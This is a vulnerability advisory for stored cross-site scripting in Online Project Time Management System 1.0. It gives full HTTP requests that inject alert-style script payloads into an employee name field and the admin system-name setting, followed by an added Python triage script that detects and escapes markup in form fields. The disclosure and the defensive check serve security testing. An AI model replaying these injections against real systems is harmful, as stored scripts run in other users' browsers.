Online Project Time Management System 1.0 Multiple Stored Cross Site Scripting (XSS) (Authenticated)

2022.02.02
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Online Project Time Management System 1.0 - Multiple Stored XSS (Authenticated)
# Date: 19/01/2022
# Exploit Author: Felipe Alcantara (Filiplain)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Kali Linux
# Description: Stored XSS in multiple fields...

# Steps to reproduce (with employee access)
# Log in as an employee
# Go to: http://localhost/ptms/?page=user
# Add XSS payload to any field of the user's name.
# Click Update

=================
POST /ptms/classes/Users.php?f=save_employee HTTP/1.1
Host: localhost
Content-Length: 1339
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvsLkAfaBC64Uzoak
Origin: http://localhost
Referer: http://localhost/ptms/?page=user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
Connection: close

------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="id"

4
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="code"

2022-0003
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="generated_password"


------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="firstname"

Mark
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="middlename"

<script>alert("XSS_TEST")</script>
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="lastname"

Cooper
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="gender"

Male
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="department"

IT Department
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="position"

Department Manager
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="email"

mcooper@sample.com
------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="password"


------WebKitFormBoundaryvsLkAfaBC64Uzoak
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryvsLkAfaBC64Uzoak--
=================

-----------------------------------------------------------------------------

# Steps to reproduce (with admin access)
# Log in to the admin panel
# Go to: http://localhost/ptms/admin/?page=system_info
# Add XSS payload to the 'System Name' field
# Click Update

=================
POST /ptms/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
Content-Length: 603
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCibB6pEzThjb4Zcq
Origin: http://localhost
Referer: http://localhost/ptms/admin/?page=system_info
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
Connection: close

------WebKitFormBoundaryCibB6pEzThjb4Zcq
Content-Disposition: form-data; name="name"

Online Project Time Management System - PHP <script>alert("XSS")</script>
------WebKitFormBoundaryCibB6pEzThjb4Zcq
Content-Disposition: form-data; name="short_name"

PTMS - PHP
------WebKitFormBoundaryCibB6pEzThjb4Zcq
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryCibB6pEzThjb4Zcq
Content-Disposition: form-data; name="cover"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryCibB6pEzThjb4Zcq--
=================
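The following triage check is an added example, not part of the advisory or of the PTMS code base: it parses a multipart/form-data body shaped like the save_employee request above (the sample body is constructed, modelled on that request), skips file parts, flags any text field carrying HTML markup characters, and shows the HTML-escaped form the application should emit when it renders such a value. The same check applies unchanged to the update_settings request's "name" field.

```python
import html
import re

# Constructed sample modelled on the advisory's save_employee request.
# The boundary string is the one shown in the capture; values are illustrative.
BOUNDARY = "----WebKitFormBoundaryvsLkAfaBC64Uzoak"
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n4\r\n"
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nMark\r\n"
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"middlename\"\r\n\r\n"
    "<script>alert(\"XSS_TEST\")</script>\r\n"
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nCooper\r\n"
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\n"
    "Content-Type: application/octet-stream\r\n\r\n\r\n"
    f"--{BOUNDARY}--\r\n"
)

# Characters that matter for HTML element and attribute contexts (CWE-79).
MARKUP_CHARS = set('<>"&')


def parse_multipart(body: str, boundary: str) -> dict:
    """Return {field_name: value} for the text parts of a multipart/form-data body.
    File parts (those whose Content-Disposition carries filename=) are skipped."""
    fields = {}
    for part in body.split(f"--{boundary}"):
        part = part.strip("\r\n")
        if not part or part == "--":          # leading empty chunk / closing "--"
            continue
        headers, _, value = part.partition("\r\n\r\n")
        match = re.search(r'name="([^"]*)"', headers)
        if match is None or "filename=" in headers:
            continue
        fields[match.group(1)] = value
    return fields


def flag_markup_fields(fields: dict) -> dict:
    """Map every field whose value contains markup characters to the
    HTML-escaped string a page should render instead of the raw value."""
    return {
        name: html.escape(value, quote=True)
        for name, value in fields.items()
        if MARKUP_CHARS & set(value)
    }


def triage_request(body: str, boundary: str) -> dict:
    """Parse the body and return only the fields a reviewer should look at."""
    return flag_markup_fields(parse_multipart(body, boundary))
```

Pointing this at the stored values (the users table and the system settings row) rather than at a request body is the way to confirm a payload has already landed.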

